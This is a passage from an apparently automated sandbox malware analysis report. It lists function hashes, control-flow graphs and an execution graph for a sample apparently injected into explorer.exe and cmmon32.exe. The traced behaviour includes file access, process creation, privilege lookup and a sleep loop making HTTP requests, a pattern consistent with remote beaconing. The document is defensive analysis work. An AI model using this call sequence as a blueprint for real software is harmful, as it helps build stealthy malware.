                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction Fuzzy Hash: 40012570518A1D8FDBC8EF1CD049B65B7E0FB58315F1545AED85DCB266C670D881CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 075515B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 422 75515b2-75515ea 423 75515ec-7551604 call 7554942 422->423 424 755160a-755162b socket 422->424 423->424
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: sock
                                          • API String ID: 98920635-2415254727
                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction ID: 6fe92f0eb891198874225bb4d2f31febae08a00a202b53d3df8dcca00cc76c92
                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction Fuzzy Hash: 3B014F70618A5C8FCB84EF1CE048B54BBE0FB59354F1545AEE85ECB266C7B0C981CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 075492DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 427 75492dd-7549320 call 7554942 430 7549326 427->430 431 75493fa-754940e 427->431 432 7549328-7549339 SleepEx 430->432 432->432 433 754933b-7549341 432->433 434 7549343-7549349 433->434 435 754934b-7549352 433->435 434->435 436 754935c-754936a call 7553f12 434->436 437 7549354-754935a 435->437 438 7549370-7549376 435->438 436->438 437->436 437->438 439 75493b7-75493bd 438->439 440 7549378-754937e 438->440 443 75493d4-75493db 439->443 444 75493bf-75493cf call 7549e72 439->444 440->439 442 7549380-754938a 440->442 442->439 446 754938c-75493b1 call 754a432 442->446 443->432 448 75493e1-75493f5 call 75490f2 443->448 444->443 446->439 448->432
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction ID: 9601c2a416aa541c767ee004f63204e7d83541dfefa12e4ad24d520f23569347
                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction Fuzzy Hash: E6316CB4614B0EDEDB68AF6980892EAF7A0FB95308F44426FC91DCA146C774A150CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07549412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction ID: 711bd6789ba8c8638932716f1f0eec4c742882404469c0d42fd1776ae073cc57
                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction Fuzzy Hash: F5F0C270668A494FD788EB2CD44566AF3E0FBE9214F44063FA94DC3264DA29D5818716
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:5.4%
                                          Dynamic/Decrypted Code Coverage:1.9%
                                          Signature Coverage:0%
                                          Total number of Nodes:633
                                          Total number of Limit Nodes:86
                                          execution_graph 31560 1befed 31563 1bb9c0 31560->31563 31564 1bb9e6 31563->31564 31571 1a9d30 31564->31571 31566 1bb9f2 31567 1bba16 31566->31567 31579 1a8f30 31566->31579 31617 1ba6a0 31567->31617 31620 1a9c80 31571->31620 31573 1a9d3d 31574 1a9d44 31573->31574 31632 1a9c20 31573->31632 31574->31566 31580 1a8f57 31579->31580 32053 1ab1b0 31580->32053 31582 1a8f69 32057 1aaf00 31582->32057 31584 1a8f86 31591 1a8f8d 31584->31591 32128 1aae30 LdrLoadDll 31584->32128 31587 1a8ffc 32073 1af400 31587->32073 31589 1a9006 31590 1bbf80 2 API calls 31589->31590 31613 1a90f2 31589->31613 31592 1a902a 31590->31592 31591->31613 32061 1af370 31591->32061 31593 1bbf80 2 API calls 31592->31593 31594 1a903b 31593->31594 31595 1bbf80 2 API calls 31594->31595 31596 1a904c 31595->31596 32085 1aca80 31596->32085 31598 1a9059 31599 1b4a40 8 API calls 31598->31599 31600 1a9066 31599->31600 31601 1b4a40 8 API calls 31600->31601 31602 1a9077 31601->31602 31603 1a9084 31602->31603 31604 1a90a5 31602->31604 32095 1ad610 31603->32095 31605 1b4a40 8 API calls 31604->31605 31612 1a90c1 31605->31612 31608 1a90e9 31610 1a8d00 23 API calls 31608->31610 31610->31613 31611 1a9092 32111 1a8d00 31611->32111 31612->31608 32129 1ad6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31612->32129 31613->31567 31618 1ba6bf 31617->31618 31619 1baf50 LdrLoadDll 31617->31619 31619->31618 31651 1b8bb0 31620->31651 31624 1a9ca6 31624->31573 31625 1a9c9c 31625->31624 31658 1bb2a0 31625->31658 31627 1a9ce3 31627->31624 31669 1a9aa0 31627->31669 31629 1a9d03 31675 1a9620 LdrLoadDll 31629->31675 31631 1a9d15 31631->31573 31633 1a9c3a 31632->31633 31634 1bb590 LdrLoadDll 31632->31634 32028 1bb590 31633->32028 31634->31633 31637 1bb590 LdrLoadDll 31638 1a9c61 31637->31638 31639 1af170 31638->31639 31640 1af189 31639->31640 32036 1ab030 31640->32036 31642 1af19c 32040 1ba1d0 31642->32040 31646 1af1c2 31647 1af1ed 31646->31647 32046 1ba250 31646->32046 31649 1ba480 2 API calls 31647->31649 31650 1a9d55 31649->31650 31650->31566 31652 1b8bbf 31651->31652 31676 1b4e40 31652->31676 31654 1a9c93 31655 1b8a60 31654->31655 31682 1ba5f0 31655->31682 31659 1bb2b9 31658->31659 31689 1b4a40 31659->31689 31661 1bb2d1 31662 1bb2da 31661->31662 31728 1bb0e0 31661->31728 31662->31627 31664 1bb2ee 31664->31662 31746 1b9ef0 31664->31746 32006 1a7ea0 31669->32006 31671 1a9ac1 31671->31629 31672 1a9aba 31672->31671 32019 1a8160 31672->32019 31675->31631 31677 1b4e4e 31676->31677 31678 1b4e5a 31676->31678 31677->31678 31681 1b52c0 LdrLoadDll 31677->31681 31678->31654 31680 1b4fac 31680->31654 31681->31680 31685 1baf50 31682->31685 31684 1b8a75 31684->31625 31686 1baf60 31685->31686 31687 1baf82 31685->31687 31688 1b4e40 LdrLoadDll 31686->31688 31687->31684 31688->31687 31690 1b4d75 31689->31690 31700 1b4a54 31689->31700 31690->31661 31693 1b4b63 31814 1ba450 LdrLoadDll 31693->31814 31694 1b4b80 31757 1ba350 31694->31757 31697 1b4b6d 31697->31661 31698 1b4ba7 31699 1bbdb0 2 API calls 31698->31699 31702 1b4bb3 31699->31702 31700->31690 31754 1b9c40 31700->31754 31701 1b4d39 31704 1ba480 2 API calls 31701->31704 31702->31697 31702->31701 31703 1b4d4f 31702->31703 31708 1b4c42 31702->31708 31823 1b4780 LdrLoadDll NtReadFile NtClose 31703->31823 31705 1b4d40 31704->31705 31705->31661 31707 1b4d62 31707->31661 31709 1b4ca9 31708->31709 31711 1b4c51 31708->31711 31709->31701 31710 1b4cbc 31709->31710 31816 1ba2d0 31710->31816 31713 1b4c6a 31711->31713 31714 1b4c56 31711->31714 31717 1b4c6f 31713->31717 31718 1b4c87 31713->31718 31815 1b4640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31714->31815 31760 1b46e0 31717->31760 31718->31705 31772 1b4400 31718->31772 31720 1b4c60 31720->31661 31722 1b4d1c 31820 1ba480 31722->31820 31723 1b4c7d 31723->31661 31726 1b4c9f 31726->31661 31727 1b4d28 31727->31661 31729 1bb0f1 31728->31729 31730 1bb103 31729->31730 31845 1bbd30 31729->31845 31730->31664 31732 1bb124 31848 1b4060 31732->31848 31734 1bb170 31734->31664 31735 1bb147 31735->31734 31736 1b4060 3 API calls 31735->31736 31739 1bb169 31736->31739 31738 1bb1fa 31740 1bb20a 31738->31740 31974 1baef0 LdrLoadDll 31738->31974 31739->31734 31880 1b5380 31739->31880 31890 1bad60 31740->31890 31743 1bb238 31969 1b9eb0 31743->31969 31747 1baf50 LdrLoadDll 31746->31747 31748 1b9f0c 31747->31748 32000 459967a 31748->32000 31749 1b9f27 31751 1bbdb0 31749->31751 32003 1ba660 31751->32003 31753 1bb349 31753->31627 31755 1b4b34 31754->31755 31756 1baf50 LdrLoadDll 31754->31756 31755->31693 31755->31694 31755->31697 31756->31755 31758 1baf50 LdrLoadDll 31757->31758 31759 1ba36c NtCreateFile 31758->31759 31759->31698 31761 1b46fc 31760->31761 31762 1ba2d0 LdrLoadDll 31761->31762 31763 1b471d 31762->31763 31764 1b4738 31763->31764 31765 1b4724 31763->31765 31767 1ba480 2 API calls 31764->31767 31766 1ba480 2 API calls 31765->31766 31768 1b472d 31766->31768 31769 1b4741 31767->31769 31768->31723 31824 1bbfc0 31769->31824 31771 1b474c 31771->31723 31773 1b444b 31772->31773 31774 1b447e 31772->31774 31776 1ba2d0 LdrLoadDll 31773->31776 31775 1b45c9 31774->31775 31780 1b449a 31774->31780 31777 1ba2d0 LdrLoadDll 31775->31777 31778 1b4466 31776->31778 31784 1b45e4 31777->31784 31779 1ba480 2 API calls 31778->31779 31781 1b446f 31779->31781 31782 1ba2d0 LdrLoadDll 31780->31782 31781->31726 31783 1b44b5 31782->31783 31786 1b44bc 31783->31786 31787 1b44d1 31783->31787 31844 1ba310 LdrLoadDll 31784->31844 31789 1ba480 2 API calls 31786->31789 31790 1b44ec 31787->31790 31791 1b44d6 31787->31791 31788 1b461e 31792 1ba480 2 API calls 31788->31792 31793 1b44c5 31789->31793 31799 1b44f1 31790->31799 31832 1bbf80 31790->31832 31794 1ba480 2 API calls 31791->31794 31795 1b4629 31792->31795 31793->31726 31796 1b44df 31794->31796 31795->31726 31796->31726 31807 1b4503 31799->31807 31835 1ba400 31799->31835 31800 1b4557 31801 1b456e 31800->31801 31843 1ba290 LdrLoadDll 31800->31843 31802 1b458a 31801->31802 31803 1b4575 31801->31803 31806 1ba480 2 API calls 31802->31806 31805 1ba480 2 API calls 31803->31805 31805->31807 31809 1b4593 31806->31809 31807->31726 31808 1b45bf 31808->31726 31809->31808 31838 1bbb80 31809->31838 31811 1b45aa 31812 1bbdb0 2 API calls 31811->31812 31813 1b45b3 31812->31813 31813->31726 31814->31697 31815->31720 31817 1baf50 LdrLoadDll 31816->31817 31818 1b4d04 31817->31818 31819 1ba310 LdrLoadDll 31818->31819 31819->31722 31821 1ba49c NtClose 31820->31821 31822 1baf50 LdrLoadDll 31820->31822 31821->31727 31822->31821 31823->31707 31826 1bbfda 31824->31826 31829 1ba620 31824->31829 31826->31771 31827 1b4e40 LdrLoadDll 31826->31827 31828 1bc020 31827->31828 31828->31771 31830 1baf50 LdrLoadDll 31829->31830 31831 1ba63c RtlAllocateHeap 31830->31831 31831->31826 31833 1ba620 2 API calls 31832->31833 31834 1bbf98 31833->31834 31834->31799 31836 1ba41c NtReadFile 31835->31836 31837 1baf50 LdrLoadDll 31835->31837 31836->31800 31837->31836 31839 1bbb8d 31838->31839 31840 1bbba4 31838->31840 31839->31840 31841 1bbf80 2 API calls 31839->31841 31840->31811 31842 1bbbbb 31841->31842 31842->31811 31843->31801 31844->31788 31975 1ba530 31845->31975 31847 1bbd5d 31847->31732 31849 1b4071 31848->31849 31850 1b4079 31848->31850 31849->31735 31851 1b434c 31850->31851 31978 1bcf20 31850->31978 31851->31735 31853 1b40cd 31854 1bcf20 2 API calls 31853->31854 31857 1b40d8 31854->31857 31855 1b4126 31858 1bcf20 2 API calls 31855->31858 31857->31855 31859 1bd050 3 API calls 31857->31859 31992 1bcfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 31857->31992 31861 1b413a 31858->31861 31859->31857 31860 1b4197 31862 1bcf20 2 API calls 31860->31862 31861->31860 31983 1bd050 31861->31983 31863 1b41ad 31862->31863 31865 1b41ea 31863->31865 31867 1bd050 3 API calls 31863->31867 31866 1bcf20 2 API calls 31865->31866 31868 1b41f5 31866->31868 31867->31863 31869 1bd050 3 API calls 31868->31869 31876 1b422f 31868->31876 31869->31868 31872 1bcf80 2 API calls 31873 1b432e 31872->31873 31874 1bcf80 2 API calls 31873->31874 31875 1b4338 31874->31875 31877 1bcf80 2 API calls 31875->31877 31989 1bcf80 31876->31989 31878 1b4342 31877->31878 31879 1bcf80 2 API calls 31878->31879 31879->31851 31881 1b5391 31880->31881 31882 1b4a40 8 API calls 31881->31882 31884 1b53a7 31882->31884 31883 1b53fa 31883->31738 31884->31883 31885 1b53e2 31884->31885 31886 1b53f5 31884->31886 31888 1bbdb0 2 API calls 31885->31888 31887 1bbdb0 2 API calls 31886->31887 31887->31883 31889 1b53e7 31888->31889 31889->31738 31891 1bad74 31890->31891 31892 1bac20 LdrLoadDll 31890->31892 31993 1bac20 31891->31993 31892->31891 31895 1bac20 LdrLoadDll 31896 1bad86 31895->31896 31897 1bac20 LdrLoadDll 31896->31897 31898 1bad8f 31897->31898 31899 1bac20 LdrLoadDll 31898->31899 31900 1bad98 31899->31900 31901 1bac20 LdrLoadDll 31900->31901 31902 1bada1 31901->31902 31903 1bac20 LdrLoadDll 31902->31903 31904 1badad 31903->31904 31905 1bac20 LdrLoadDll 31904->31905 31906 1badb6 31905->31906 31907 1bac20 LdrLoadDll 31906->31907 31908 1badbf 31907->31908 31909 1bac20 LdrLoadDll 31908->31909 31910 1badc8 31909->31910 31911 1bac20 LdrLoadDll 31910->31911 31912 1badd1 31911->31912 31913 1bac20 LdrLoadDll 31912->31913 31914 1badda 31913->31914 31915 1bac20 LdrLoadDll 31914->31915 31916 1bade6 31915->31916 31917 1bac20 LdrLoadDll 31916->31917 31918 1badef 31917->31918 31919 1bac20 LdrLoadDll 31918->31919 31920 1badf8 31919->31920 31921 1bac20 LdrLoadDll 31920->31921 31922 1bae01 31921->31922 31923 1bac20 LdrLoadDll 31922->31923 31924 1bae0a 31923->31924 31925 1bac20 LdrLoadDll 31924->31925 31926 1bae13 31925->31926 31927 1bac20 LdrLoadDll 31926->31927 31928 1bae1f 31927->31928 31929 1bac20 LdrLoadDll 31928->31929 31930 1bae28 31929->31930 31931 1bac20 LdrLoadDll 31930->31931 31932 1bae31 31931->31932 31933 1bac20 LdrLoadDll 31932->31933 31934 1bae3a 31933->31934 31935 1bac20 LdrLoadDll 31934->31935 31936 1bae43 31935->31936 31937 1bac20 LdrLoadDll 31936->31937 31938 1bae4c 31937->31938 31939 1bac20 LdrLoadDll 31938->31939 31940 1bae58 31939->31940 31941 1bac20 LdrLoadDll 31940->31941 31942 1bae61 31941->31942 31943 1bac20 LdrLoadDll 31942->31943 31944 1bae6a 31943->31944 31945 1bac20 LdrLoadDll 31944->31945 31946 1bae73 31945->31946 31947 1bac20 LdrLoadDll 31946->31947 31948 1bae7c 31947->31948 31949 1bac20 LdrLoadDll 31948->31949 31950 1bae85 31949->31950 31951 1bac20 LdrLoadDll 31950->31951 31952 1bae91 31951->31952 31953 1bac20 LdrLoadDll 31952->31953 31954 1bae9a 31953->31954 31955 1bac20 LdrLoadDll 31954->31955 31956 1baea3 31955->31956 31957 1bac20 LdrLoadDll 31956->31957 31958 1baeac 31957->31958 31959 1bac20 LdrLoadDll 31958->31959 31960 1baeb5 31959->31960 31961 1bac20 LdrLoadDll 31960->31961 31962 1baebe 31961->31962 31963 1bac20 LdrLoadDll 31962->31963 31964 1baeca 31963->31964 31965 1bac20 LdrLoadDll 31964->31965 31966 1baed3 31965->31966 31967 1bac20 LdrLoadDll 31966->31967 31968 1baedc 31967->31968 31968->31743 31970 1baf50 LdrLoadDll 31969->31970 31971 1b9ecc 31970->31971 31999 4599860 LdrInitializeThunk 31971->31999 31972 1b9ee3 31972->31664 31974->31740 31976 1baf50 LdrLoadDll 31975->31976 31977 1ba54c NtAllocateVirtualMemory 31976->31977 31977->31847 31979 1bcf30 31978->31979 31980 1bcf36 31978->31980 31979->31853 31981 1bbf80 2 API calls 31980->31981 31982 1bcf5c 31981->31982 31982->31853 31984 1bcfc0 31983->31984 31985 1bd01d 31984->31985 31986 1bbf80 2 API calls 31984->31986 31985->31861 31987 1bcffa 31986->31987 31988 1bbdb0 2 API calls 31987->31988 31988->31985 31990 1b4324 31989->31990 31991 1bbdb0 2 API calls 31989->31991 31990->31872 31991->31990 31992->31857 31994 1bac3b 31993->31994 31995 1b4e40 LdrLoadDll 31994->31995 31996 1bac5b 31995->31996 31997 1b4e40 LdrLoadDll 31996->31997 31998 1bad07 31996->31998 31997->31998 31998->31895 31999->31972 32001 459968f LdrInitializeThunk 32000->32001 32002 4599681 32000->32002 32001->31749 32002->31749 32004 1ba67c RtlFreeHeap 32003->32004 32005 1baf50 LdrLoadDll 32003->32005 32004->31753 32005->32004 32007 1a7eab 32006->32007 32008 1a7eb0 32006->32008 32007->31672 32009 1bbd30 2 API calls 32008->32009 32012 1a7ed5 32009->32012 32010 1a7f38 32010->31672 32011 1b9eb0 2 API calls 32011->32012 32012->32010 32012->32011 32013 1a7f3e 32012->32013 32017 1bbd30 2 API calls 32012->32017 32022 1ba5b0 32012->32022 32015 1a7f64 32013->32015 32016 1ba5b0 2 API calls 32013->32016 32015->31672 32018 1a7f55 32016->32018 32017->32012 32018->31672 32020 1a817e 32019->32020 32021 1ba5b0 2 API calls 32019->32021 32020->31629 32021->32020 32023 1baf50 LdrLoadDll 32022->32023 32024 1ba5cc 32023->32024 32027 45996e0 LdrInitializeThunk 32024->32027 32025 1ba5e3 32025->32012 32027->32025 32029 1bb5b3 32028->32029 32032 1aace0 32029->32032 32033 1aad04 32032->32033 32034 1a9c4b 32033->32034 32035 1aad40 LdrLoadDll 32033->32035 32034->31637 32035->32034 32038 1ab053 32036->32038 32037 1ab0d0 32037->31642 32038->32037 32051 1b9c80 LdrLoadDll 32038->32051 32041 1baf50 LdrLoadDll 32040->32041 32042 1af1ab 32041->32042 32042->31650 32043 1ba7c0 32042->32043 32044 1baf50 LdrLoadDll 32043->32044 32045 1ba7df LookupPrivilegeValueW 32044->32045 32045->31646 32047 1baf50 LdrLoadDll 32046->32047 32048 1ba26c 32047->32048 32052 4599910 LdrInitializeThunk 32048->32052 32049 1ba28b 32049->31647 32051->32037 32052->32049 32054 1ab1e0 32053->32054 32055 1ab030 LdrLoadDll 32054->32055 32056 1ab1f4 32055->32056 32056->31582 32058 1aaf24 32057->32058 32130 1b9c80 LdrLoadDll 32058->32130 32060 1aaf5e 32060->31584 32062 1af39c 32061->32062 32063 1ab1b0 LdrLoadDll 32062->32063 32064 1af3ae 32063->32064 32131 1af280 32064->32131 32067 1af3c9 32068 1ba480 2 API calls 32067->32068 32071 1af3d4 32067->32071 32068->32071 32069 1af3e1 32070 1ba480 2 API calls 32069->32070 32072 1af3f2 32069->32072 32070->32072 32071->31587 32072->31587 32074 1af42c 32073->32074 32150 1ab2a0 32074->32150 32076 1af43e 32077 1af280 3 API calls 32076->32077 32078 1af44f 32077->32078 32079 1af459 32078->32079 32082 1af471 32078->32082 32080 1af464 32079->32080 32083 1ba480 2 API calls 32079->32083 32080->31589 32081 1af482 32081->31589 32082->32081 32084 1ba480 2 API calls 32082->32084 32083->32080 32084->32081 32086 1aca96 32085->32086 32087 1acaa0 32085->32087 32086->31598 32088 1aaf00 LdrLoadDll 32087->32088 32089 1acb3e 32088->32089 32090 1acb64 32089->32090 32091 1ab030 LdrLoadDll 32089->32091 32090->31598 32092 1acb80 32091->32092 32093 1b4a40 8 API calls 32092->32093 32094 1acbd5 32093->32094 32094->31598 32096 1ad636 32095->32096 32097 1ab030 LdrLoadDll 32096->32097 32098 1ad64a 32097->32098 32154 1ad300 32098->32154 32100 1a908b 32101 1acbf0 32100->32101 32102 1acc16 32101->32102 32103 1ab030 LdrLoadDll 32102->32103 32104 1acc99 32102->32104 32103->32104 32105 1ab030 LdrLoadDll 32104->32105 32106 1acd06 32105->32106 32107 1aaf00 LdrLoadDll 32106->32107 32108 1acd6f 32107->32108 32109 1ab030 LdrLoadDll 32108->32109 32110 1ace1f 32109->32110 32110->31611 32113 1a8d14 32111->32113 32183 1af6c0 32111->32183 32124 1a8f25 32113->32124 32188 1b4390 32113->32188 32115 1a8d70 32115->32124 32191 1a8ab0 32115->32191 32118 1bcf20 2 API calls 32119 1a8db2 32118->32119 32120 1bd050 3 API calls 32119->32120 32125 1a8dc7 32120->32125 32121 1a7ea0 4 API calls 32121->32125 32124->31567 32125->32121 32125->32124 32126 1ac7a0 18 API calls 32125->32126 32127 1a8160 2 API calls 32125->32127 32196 1af660 32125->32196 32200 1af070 21 API calls 32125->32200 32126->32125 32127->32125 32128->31591 32129->31608 32130->32060 32132 1af29a 32131->32132 32140 1af350 32131->32140 32133 1ab030 LdrLoadDll 32132->32133 32134 1af2bc 32133->32134 32141 1b9f30 32134->32141 32136 1af2fe 32144 1b9f70 32136->32144 32139 1ba480 2 API calls 32139->32140 32140->32067 32140->32069 32142 1baf50 LdrLoadDll 32141->32142 32143 1b9f4c 32142->32143 32143->32136 32145 1baf50 LdrLoadDll 32144->32145 32146 1b9f8c 32145->32146 32149 4599fe0 LdrInitializeThunk 32146->32149 32147 1af344 32147->32139 32149->32147 32151 1ab2c7 32150->32151 32152 1ab030 LdrLoadDll 32151->32152 32153 1ab303 32152->32153 32153->32076 32155 1ad317 32154->32155 32163 1af700 32155->32163 32159 1ad392 32159->32100 32160 1ad38b 32160->32159 32174 1ba290 LdrLoadDll 32160->32174 32162 1ad3a5 32162->32100 32164 1af725 32163->32164 32175 1a81a0 32164->32175 32166 1ad35f 32171 1ba6d0 32166->32171 32167 1b4a40 8 API calls 32169 1af749 32167->32169 32169->32166 32169->32167 32170 1bbdb0 2 API calls 32169->32170 32182 1af540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32169->32182 32170->32169 32172 1baf50 LdrLoadDll 32171->32172 32173 1ba6ef CreateProcessInternalW 32172->32173 32173->32160 32174->32162 32176 1a829f 32175->32176 32177 1a81b5 32175->32177 32176->32169 32177->32176 32178 1b4a40 8 API calls 32177->32178 32179 1a8222 32178->32179 32180 1bbdb0 2 API calls 32179->32180 32181 1a8249 32179->32181 32180->32181 32181->32169 32182->32169 32184 1af6df 32183->32184 32185 1b4e40 LdrLoadDll 32183->32185 32186 1af6ed 32184->32186 32187 1af6e6 SetErrorMode 32184->32187 32185->32184 32186->32113 32187->32186 32201 1af490 32188->32201 32190 1b43b6 32190->32115 32192 1bbd30 2 API calls 32191->32192 32193 1a8ad5 32192->32193 32194 1a8cea 32193->32194 32220 1b9870 32193->32220 32194->32118 32197 1af673 32196->32197 32268 1b9e80 32197->32268 32200->32125 32202 1af4ad 32201->32202 32208 1b9fb0 32202->32208 32205 1af4f5 32205->32190 32209 1baf50 LdrLoadDll 32208->32209 32210 1b9fcc 32209->32210 32218 45999a0 LdrInitializeThunk 32210->32218 32211 1af4ee 32211->32205 32213 1ba000 32211->32213 32214 1baf50 LdrLoadDll 32213->32214 32215 1ba01c 32214->32215 32219 4599780 LdrInitializeThunk 32215->32219 32216 1af51e 32216->32190 32218->32211 32219->32216 32221 1bbf80 2 API calls 32220->32221 32222 1b9887 32221->32222 32241 1a9310 32222->32241 32224 1b98a2 32225 1b98c9 32224->32225 32226 1b98e0 32224->32226 32227 1bbdb0 2 API calls 32225->32227 32228 1bbd30 2 API calls 32226->32228 32229 1b98d6 32227->32229 32230 1b991a 32228->32230 32229->32194 32231 1bbd30 2 API calls 32230->32231 32232 1b9933 32231->32232 32238 1b9bd4 32232->32238 32247 1bbd70 LdrLoadDll 32232->32247 32234 1b9bb9 32235 1b9bc0 32234->32235 32234->32238 32236 1bbdb0 2 API calls 32235->32236 32237 1b9bca 32236->32237 32237->32194 32239 1bbdb0 2 API calls 32238->32239 32240 1b9c29 32239->32240 32240->32194 32242 1a9335 32241->32242 32243 1aace0 LdrLoadDll 32242->32243 32244 1a9368 32243->32244 32246 1a938d 32244->32246 32248 1acf10 32244->32248 32246->32224 32247->32234 32249 1acf3c 32248->32249 32250 1ba1d0 LdrLoadDll 32249->32250 32251 1acf55 32250->32251 32252 1acf5c 32251->32252 32259 1ba210 32251->32259 32252->32246 32256 1acf97 32257 1ba480 2 API calls 32256->32257 32258 1acfba 32257->32258 32258->32246 32260 1baf50 LdrLoadDll 32259->32260 32261 1ba22c 32260->32261 32267 4599710 LdrInitializeThunk 32261->32267 32262 1acf7f 32262->32252 32264 1ba800 32262->32264 32265 1ba81f 32264->32265 32266 1baf50 LdrLoadDll 32264->32266 32265->32256 32266->32265 32267->32262 32269 1b9e9c 32268->32269 32270 1baf50 LdrLoadDll 32268->32270 32273 4599840 LdrInitializeThunk 32269->32273 32270->32269 32271 1af69e 32271->32125 32273->32271 32275 4599540 LdrInitializeThunk 32278 1b9070 32279 1bbd30 2 API calls 32278->32279 32281 1b90ab 32279->32281 32280 1b918c 32281->32280 32282 1aace0 LdrLoadDll 32281->32282 32283 1b90e1 32282->32283 32284 1b4e40 LdrLoadDll 32283->32284 32286 1b90fd 32284->32286 32285 1b9110 Sleep 32285->32286 32286->32280 32286->32285 32289 1b8c90 32286->32289 32311 1b8ea0 LdrLoadDll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA 32286->32311 32290 1b8cb5 32289->32290 32293 1b8d0f 32290->32293 32312 1ba970 32290->32312 32292 1b8e73 32292->32286 32293->32292 32317 1ba9e0 32293->32317 32295 1b8d50 32295->32292 32322 1baa60 32295->32322 32297 1b8d7d 32298 1b8d97 32297->32298 32299 1b8d86 32297->32299 32327 1baae0 32298->32327 32332 1babc0 LdrLoadDll 32299->32332 32302 1b8d8d 32302->32286 32303 1b8e59 32335 1babc0 LdrLoadDll 32303->32335 32305 1b8e6c 32336 1babc0 LdrLoadDll 32305->32336 32308 1b8da6 32308->32303 32333 1bab50 LdrLoadDll 32308->32333 32309 1b8e26 32309->32303 32334 1bab50 LdrLoadDll 32309->32334 32311->32286 32337 1bb000 32312->32337 32315 1ba9ce 32315->32293 32316 1ba9b3 InternetOpenA 32316->32293 32318 1baa1f 32317->32318 32319 1bb000 LdrLoadDll 32317->32319 32320 1baa28 InternetConnectA 32318->32320 32321 1baa4f 32318->32321 32319->32318 32320->32295 32321->32295 32323 1baa9f 32322->32323 32324 1bb000 LdrLoadDll 32322->32324 32325 1baaa8 HttpOpenRequestA 32323->32325 32326 1baacf 32323->32326 32324->32323 32325->32297 32326->32297 32328 1bab1f 32327->32328 32329 1bb000 LdrLoadDll 32327->32329 32330 1bab28 HttpSendRequestA 32328->32330 32331 1bab43 32328->32331 32329->32328 32330->32308 32331->32308 32332->32302 32333->32309 32334->32309 32335->32305 32336->32292 32338 1bb00c 32337->32338 32339 1ba9aa 32337->32339 32340 1b4e40 LdrLoadDll 32338->32340 32339->32315 32339->32316 32340->32339

                                          Executed Functions

                                          Function 001BA34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,001B4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001B4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 001BA39D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: dc1552102048962117bf7a584c49d718d4a620915cc002a73c01eddb7c03af01
                                          • Instruction ID: 3e10b9903d8d76970d875feabe2ce4f7101dbe0707dad471a28c6a0d7103c836
                                          • Opcode Fuzzy Hash: dc1552102048962117bf7a584c49d718d4a620915cc002a73c01eddb7c03af01
                                          • Instruction Fuzzy Hash: 9B01BDB2200108AFCB58CF98DC95EEB7BA9EF8C754F158648FA5DD7241C631E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,001B4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001B4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 001BA39D
                                          Strings
                                          Memory Dump Source
